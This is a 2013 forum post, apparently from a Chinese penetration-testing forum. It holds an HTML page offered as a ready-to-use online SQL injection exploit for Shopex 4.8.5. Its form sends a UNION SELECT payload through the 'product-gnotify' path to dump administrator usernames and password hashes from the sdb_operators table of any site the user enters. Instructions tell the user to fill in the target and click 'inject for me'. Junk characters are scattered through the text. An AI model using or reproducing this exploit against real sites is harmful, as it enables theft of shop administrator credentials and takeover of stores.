<center>
/ Q5 a% t. y- K* Q: o<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>* a G# d, A1 s5 g; F: H3 h9 u- I
<form action="" method="post" name="submit_url">3 M ]% K/ Q4 o9 f7 u w" f
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>0 X2 y; g& V1 B3 w) u
<input type="hidden" name="goods[goods_id]" value="3">
. F" T4 u& \* e" G+ C6 A<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">/ w: ^5 q' f' R( \
<input type="submit" value="给我注入" onclick=fsubmit()>
E" P; V5 F$ C* q9 v: ]) d</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
' n4 o5 Y1 J2 u. j0 A3 {$ ^" T" q$ W) e/ L5 K+ g
<script>
' F9 @! E- U% f1 [9 j2 a! }/ |) Qfunction fsubmit(){ + G& V# r- ?- `/ T! N. p2 d
form = document.forms[0]; ) o( s4 q4 Z5 P$ p7 W/ Z/ j5 Q
form.action = form.url.value+'/?product-gnotify';
( u# w5 D$ _ _% B6 m0 b2 iform.submit(); 3 t2 _( ^" M$ n, ~8 ?. j$ @: b
}
4 d7 {1 f: R- }- i</script>2 I! c3 }4 [7 v, F: \7 x; C2 X- ^
|
发表于 2013-1-23 09:20:52
收藏
支持
反对